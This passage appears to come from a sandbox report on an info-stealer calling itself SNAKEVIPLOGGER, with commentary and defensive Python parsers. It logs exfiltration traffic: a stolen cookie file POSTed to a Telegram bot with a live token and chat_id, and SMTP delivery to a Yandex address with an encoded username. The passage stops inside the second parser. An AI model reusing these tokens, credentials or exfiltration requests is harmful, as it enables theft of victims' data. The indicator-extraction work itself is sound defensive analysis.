                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O92Gbm46CR6eiSKOkVjQBRZtwMoL4u10bFQ2ClSQs8UvEyXqcP%2FjPS%2FrcqJ8o%2B1nInB%2F3RZZ32kIj4fbWvgQf5zjxUXty8pIxfVkjCV7%2Fmf5WtMa5p1xWy5c7HTu4danOAsnNMdX"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8869d94f0a4269-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:35:28 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:35:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      16 | 192.168.2.5 | 49744 | 188.114.97.3 | 443 | 6024 | C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-07-25 01:35:29 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:35:29 UTC | 707 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:35:29 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 52
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fXEaC32z4KcBqpBcFuZXUu6kaNVC%2FBUYsXBUTf%2FO1mfI8mzRE1M1IivMOxhy86oMDtageNok0Dxi7nV%2FlgcQeZ8qGLfEwylNiOvW%2FORa%2BTmmkaOeLtcmEpABb0mYktMc1OzHM2mW"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8869e13d6c0c76-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:35:29 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:35:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      17 | 192.168.2.5 | 49746 | 188.114.97.3 | 443 | 6024 | C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-07-25 01:35:30 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:35:30 UTC | 705 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:35:30 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 53
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jnIp82%2Bfh5KJ9fGK7w205gHDXfk%2FyqKBra7yS3TTJOycs8fflhbb5YsrWg3spwA%2BJdk6QX2WqgW5JTM24PJHMkmT68OAfATyg53SjUW%2FienbDA8VlONfbf2pOMQHZGvCHkcRmqQB"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8869e94d596a50-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:35:30 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:35:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      18 | 192.168.2.5 | 49748 | 188.114.97.3 | 443 | 6024 | C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-07-25 01:35:31 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:35:32 UTC | 705 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:35:32 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 55
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sgEfkPWW7wLK52DCv71JPC4f7mzaG7n%2F%2BxIszHB4H7hLifuAXsAtKLqef%2FXNA338x4T%2BqKbdKcoi4uP6QEUgIS83iXN3qJuPrkY2fSpJlDKgzy6QD70gVLYsOwu5k3ZtYch3QYPZ"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8869f13b135e67-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:35:32 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:35:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      19 | 192.168.2.5 | 49749 | 149.154.167.220 | 443 | 6024 | C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-07-25 01:35:32 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2027/07/2024%20/%2004:25:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                      Host: api.telegram.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:35:33 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx/1.18.0
                                      Date: Thu, 25 Jul 2024 01:35:32 GMT
                                      Content-Type: application/json
                                      Content-Length: 55
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-07-25 01:35:33 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      20 | 192.168.2.5 | 49751 | 149.154.167.220 | 443 | 6024 | C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-07-25 01:35:50 UTC | 376 | OUT | POST /bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendDocument?chat_id=6443825857&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcae9abfa21153
                                      Host: api.telegram.org
                                      Content-Length: 1257
                                      Connection: Keep-Alive
                                      2024-07-25 01:35:50 UTC | 1257 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 65 39 61 62 66 61 32 31 31 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 34 2f 30 37 2f 32 30 32 34 20
                                      Data Ascii: --------------------------8dcae9abfa21153Content-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies | user | VIP Recovery PC Name:124406Date and Time: 24/07/2024
                                      2024-07-25 01:35:50 UTC | 388 | IN | HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 25 Jul 2024 01:35:50 GMT
                                      Content-Type: application/json
                                      Content-Length: 546
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-07-25 01:35:50 UTC | 546 | IN | Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 36 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 33 33 39 35 36 34 36 36 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 4e 41 4b 45 56 49 50 4c 4f 47 47 45 52 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 4e 41 4b 45 56 49 50 4c 4f 47 47 45 52 42 4f 54 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 34 34 33 38 32 35 38 35 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 45 61 73 79 6d 6f 6e 69 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 64 70 73 70 61 6d 6d 69 6e 67 73 75 72 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 31 38 37 31 33 35 30 2c 22 64 6f
                                      Data Ascii: {"ok":true,"result":{"message_id":1652,"from":{"id":7339564661,"is_bot":true,"first_name":"SNAKEVIPLOGGER","username":"SNAKEVIPLOGGERBOT"},"chat":{"id":6443825857,"first_name":"Easymoni","username":"Rdpspammingsure","type":"private"},"date":1721871350,"do
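Sessions 12, 19 and 20 above are the sample's Telegram channel, and everything an analyst needs sits in the request line: the Bot API token (bot id 7339564661 followed by the secret) in the path, the operator's chat_id (6443825857) and the URL-encoded caption in the query string, while the JSON reply names the bot (SNAKEVIPLOGGER / SNAKEVIPLOGGERBOT) and the receiving account. Session 19 is the odd one out: its path is /bot/sendMessage with an empty token and an empty chat_id, which is why api.telegram.org answers 404, yet its text already carries the country name obtained from the reallyfreegeoip.org lookups in sessions 13 to 18. Note also that the uploaded part is declared as application/x-ms-dos-executable although its filename is Cookies_Recovered.txt. The Python below is an added example, not part of the Joe Sandbox report and not the malware's code, that parses request lines of this shape into those fields and flags the token-less call. The two sample lines are copied from sessions 12 and 19; the names parse_telegram_request, telegram_iocs and the regular expression are assumptions of this example.

```python
import re
from typing import Optional
from urllib.parse import parse_qs

# Request lines copied from sessions 12 and 19 of the report above (session 20
# repeats session 12). The first is the cookie-file upload, the second the
# status message that api.telegram.org answered with 404.
SAMPLE_REQUEST_LINES = [
    "POST /bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendDocument?chat_id=6443825857&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1",
    "GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2027/07/2024%20/%2004:25:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1",
]

# A Bot API token is "<numeric bot id>:<secret>". The token group is optional
# so that the empty "/bot/" path from session 19 still parses and can be flagged.
_BOT_API_LINE = re.compile(
    r"^(?P<verb>GET|POST) /bot(?:(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{30,}))?"
    r"/(?P<api>[A-Za-z]+)(?:\?(?P<query>\S*))? HTTP/1\.[01]$"
)


def parse_telegram_request(line: str) -> Optional[dict]:
    """Split one HTTP request line to api.telegram.org into bot id, token
    secret, API method, chat_id and the URL-decoded caption/text body.
    Returns None for request lines that are not Bot API calls."""
    m = _BOT_API_LINE.match(line.strip())
    if m is None:
        return None
    # keep_blank_values keeps "chat_id=" (empty) instead of dropping the key.
    params = parse_qs(m.group("query") or "", keep_blank_values=True)

    def first(key: str) -> str:
        return params.get(key, [""])[0]

    return {
        "verb": m.group("verb"),
        "bot_id": m.group("bot_id") or "",
        "secret": m.group("secret") or "",
        "api": m.group("api"),
        "chat_id": first("chat_id"),
        # sendDocument carries the message in "caption", sendMessage in "text".
        "text": first("caption") or first("text"),
    }


def telegram_iocs(lines):
    """Reduce many request lines to the (bot_id, chat_id) channels worth
    blocking or reporting, plus the API methods that were called with an
    empty token (a builder field left unset, as in session 19)."""
    channels, empty_token = set(), []
    for line in lines:
        r = parse_telegram_request(line)
        if r is None:
            continue
        if r["bot_id"] and r["chat_id"]:
            channels.add((r["bot_id"], r["chat_id"]))
        else:
            empty_token.append(r["api"])
    return channels, empty_token


if __name__ == "__main__":
    for line in SAMPLE_REQUEST_LINES:
        r = parse_telegram_request(line)
        print(r["api"], r["bot_id"] or "<no token>", r["chat_id"] or "<no chat>",
              repr(r["text"][:48]))
    print(telegram_iocs(SAMPLE_REQUEST_LINES))
```

The (bot_id, chat_id) pair is the actionable indicator from this traffic; the host-side signal is the process column of the session table, since C:\Windows\SysWOW64\svchost.exe has no reason to POST multipart uploads to api.telegram.org.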


                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                      Jul 25, 2024 03:34:56.707880020 CEST | 587 | 49734 | 118.69.190.131 | 192.168.2.5 | 220 isphost2.fptdata.vn ESMTP Exim 4.94 Thu, 25 Jul 2024 08:34:56 +0700
                                      Jul 25, 2024 03:34:56.710510015 CEST | 49734 | 587 | 192.168.2.5 | 118.69.190.131 | EHLO 124406
                                      Jul 25, 2024 03:34:57.057641029 CEST | 587 | 49734 | 118.69.190.131 | 192.168.2.5 | 250-isphost2.fptdata.vn Hello 124406 [8.46.123.33]
                                      250-SIZE 52428800
                                      250-8BITMIME
                                      250-PIPELINING
                                      250-X_PIPE_CONNECT
                                      250-AUTH PLAIN LOGIN
                                      250-STARTTLS
                                      250 HELP
                                      Jul 25, 2024 03:34:57.059765100 CEST | 49734 | 587 | 192.168.2.5 | 118.69.190.131 | AUTH login c2FsZXMtbmd1eWVuQHZ2dHJhZGUudm4=
                                      Jul 25, 2024 03:34:57.406399965 CEST | 587 | 49734 | 118.69.190.131 | 192.168.2.5 | 334 UGFzc3dvcmQ6
                                      Jul 25, 2024 03:34:57.776628017 CEST | 587 | 49734 | 118.69.190.131 | 192.168.2.5 | 235 Authentication succeeded
                                      Jul 25, 2024 03:34:57.778599977 CEST | 49734 | 587 | 192.168.2.5 | 118.69.190.131 | MAIL FROM:<sales-nguyen@vvtrade.vn>
                                      Jul 25, 2024 03:34:58.125503063 CEST | 587 | 49734 | 118.69.190.131 | 192.168.2.5 | 250 OK
                                      Jul 25, 2024 03:34:58.125696898 CEST | 49734 | 587 | 192.168.2.5 | 118.69.190.131 | RCPT TO:<saleseuropower@yandex.com>
                                      Jul 25, 2024 03:34:59.240441084 CEST | 587 | 49734 | 118.69.190.131 | 192.168.2.5 | 250 Accepted
                                      Jul 25, 2024 03:34:59.240458012 CEST | 587 | 49734 | 118.69.190.131 | 192.168.2.5 | 250 Accepted
                                      Jul 25, 2024 03:34:59.240688086 CEST | 49734 | 587 | 192.168.2.5 | 118.69.190.131 | DATA
                                      Jul 25, 2024 03:34:59.589823961 CEST | 587 | 49734 | 118.69.190.131 | 192.168.2.5 | 354 Enter message, ending with "." on a line by itself
                                      Jul 25, 2024 03:34:59.590955019 CEST | 49734 | 587 | 192.168.2.5 | 118.69.190.131 | .
                                      Jul 25, 2024 03:35:03.240335941 CEST | 587 | 49734 | 118.69.190.131 | 192.168.2.5 | 250 OK id=1sWnNj-0004Uj-DZ
                                      Jul 25, 2024 03:35:04.520241976 CEST | 49734 | 587 | 192.168.2.5 | 118.69.190.131 | QUIT
                                      Jul 25, 2024 03:35:04.867557049 CEST | 587 | 49734 | 118.69.190.131 | 192.168.2.5 | 221 isphost2.fptdata.vn closing connection
                                      Jul 25, 2024 03:35:40.596565008 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5 | 220 isphost2.fptdata.vn ESMTP Exim 4.94 Thu, 25 Jul 2024 08:35:40 +0700
                                      Jul 25, 2024 03:35:40.597001076 CEST | 49750 | 587 | 192.168.2.5 | 118.69.190.131 | EHLO 124406
                                      Jul 25, 2024 03:35:40.947813988 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5 | 250-isphost2.fptdata.vn Hello 124406 [8.46.123.33]
                                      250-SIZE 52428800
                                      250-8BITMIME
                                      250-PIPELINING
                                      250-X_PIPE_CONNECT
                                      250-AUTH PLAIN LOGIN
                                      250-STARTTLS
                                      250 HELP
                                      Jul 25, 2024 03:35:40.948426008 CEST | 49750 | 587 | 192.168.2.5 | 118.69.190.131 | AUTH login c2FsZXMtbmd1eWVuQHZ2dHJhZGUudm4=
                                      Jul 25, 2024 03:35:41.298463106 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5 | 334 UGFzc3dvcmQ6
                                      Jul 25, 2024 03:35:41.664545059 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5 | 235 Authentication succeeded
                                      Jul 25, 2024 03:35:41.664872885 CEST | 49750 | 587 | 192.168.2.5 | 118.69.190.131 | MAIL FROM:<sales-nguyen@vvtrade.vn>
                                      Jul 25, 2024 03:35:42.014945030 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5 | 250 OK
                                      Jul 25, 2024 03:35:42.015125036 CEST | 49750 | 587 | 192.168.2.5 | 118.69.190.131 | RCPT TO:<saleseuropower@yandex.com>
                                      Jul 25, 2024 03:35:42.515909910 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5 | 250 Accepted
                                      Jul 25, 2024 03:35:42.516088963 CEST | 49750 | 587 | 192.168.2.5 | 118.69.190.131 | DATA
                                      Jul 25, 2024 03:35:42.866134882 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5 | 354 Enter message, ending with "." on a line by itself
                                      Jul 25, 2024 03:35:42.866959095 CEST | 49750 | 587 | 192.168.2.5 | 118.69.190.131 | .
                                      Jul 25, 2024 03:35:49.490308046 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5 | 250 OK id=1sWnOQ-0004Z2-MQ
                                      Jul 25, 2024 03:35:50.364670038 CEST | 49750 | 587 | 192.168.2.5 | 118.69.190.131 | QUIT
                                      Jul 25, 2024 03:35:50.715406895 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5 | 221 isphost2.fptdata.vn closing connection
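The two SMTP transcripts above are the sample's second exfiltration channel. The client connects to isphost2.fptdata.vn on port 587, ignores the advertised 250-STARTTLS, and sends AUTH login with the base64 username c2FsZXMtbmd1eWVuQHZ2dHJhZGUudm4=, which decodes to sales-nguyen@vvtrade.vn, the same address it then uses in MAIL FROM; the server's 334 UGFzc3dvcmQ6 challenge is base64 for "Password:", and the client's reply to it is not shown in the report. Because no STARTTLS command was ever issued, the credentials crossed the wire base64-encoded but unencrypted, which is how the sandbox could log the username at all. Each delivery (queue ids 1sWnNj-0004Uj-DZ and 1sWnOQ-0004Z2-MQ, 01:34:56 to 01:35:04 and 01:35:40 to 01:35:50 UTC) lines up with one of the Telegram sendDocument uploads above, so the loot goes out over both channels. The Python below is an added example, not part of the report and not the malware's code, that walks a transcript of this shape and extracts the authenticated user, whether TLS protected the exchange, the sender, recipients and Exim queue ids; it goes beyond the page by also decoding AUTH PLAIN initial responses. The session list is reconstructed (and abridged) from the first transcript; summarize_smtp_session and the helper names are assumptions of this example.

```python
import base64
import binascii
from typing import Optional

# One SMTP session reconstructed from the first transcript above (port 587,
# 118.69.190.131). "S" lines were sent by isphost2.fptdata.vn, "C" lines by
# the sandbox host. The EHLO reply is abridged, and the client's answer to
# "334 Password:" is absent here because it is absent from the report.
SAMPLE_SMTP_SESSION = [
    ("S", "220 isphost2.fptdata.vn ESMTP Exim 4.94 Thu, 25 Jul 2024 08:34:56 +0700"),
    ("C", "EHLO 124406"),
    ("S", "250-isphost2.fptdata.vn Hello 124406 [8.46.123.33]"),
    ("S", "250-SIZE 52428800"),
    ("S", "250-AUTH PLAIN LOGIN"),
    ("S", "250-STARTTLS"),
    ("S", "250 HELP"),
    ("C", "AUTH login c2FsZXMtbmd1eWVuQHZ2dHJhZGUudm4="),
    ("S", "334 UGFzc3dvcmQ6"),
    ("S", "235 Authentication succeeded"),
    ("C", "MAIL FROM:<sales-nguyen@vvtrade.vn>"),
    ("S", "250 OK"),
    ("C", "RCPT TO:<saleseuropower@yandex.com>"),
    ("S", "250 Accepted"),
    ("C", "DATA"),
    ("S", '354 Enter message, ending with "." on a line by itself'),
    ("C", "."),
    ("S", "250 OK id=1sWnNj-0004Uj-DZ"),
    ("C", "QUIT"),
    ("S", "221 isphost2.fptdata.vn closing connection"),
]

SMTP_VERBS = {"EHLO", "HELO", "MAIL", "RCPT", "DATA", "QUIT", "RSET",
              "NOOP", "STARTTLS", "AUTH", "VRFY"}


def _b64_bytes(token: str) -> Optional[bytes]:
    try:
        return base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None


def _b64_text(token: str) -> Optional[str]:
    raw = _b64_bytes(token)
    try:
        return raw.decode("utf-8") if raw is not None else None
    except UnicodeDecodeError:
        return None


def _addr(arg: str) -> str:
    """'FROM:<a@b>' or 'TO:<a@b>' -> 'a@b'."""
    return arg.split("<", 1)[1].split(">", 1)[0] if "<" in arg else arg.split(":", 1)[-1].strip()


def summarize_smtp_session(session):
    """Walk a (direction, line) transcript and pull out what an analyst needs:
    who authenticated, with which mechanism, whether TLS protected it, and
    where the mail went. Handles AUTH LOGIN with or without the initial
    response, and AUTH PLAIN (RFC 4616: base64 of "\\0user\\0password")."""
    s = {"ehlo": None, "starttls_offered": False, "starttls_used": False,
         "auth_mechanism": None, "auth_user": None, "auth_password": None,
         "auth_ok": False, "mail_from": None, "rcpt_to": [], "queue_ids": []}
    expect = None  # "username" / "password" while a 334 challenge is outstanding
    for who, line in session:
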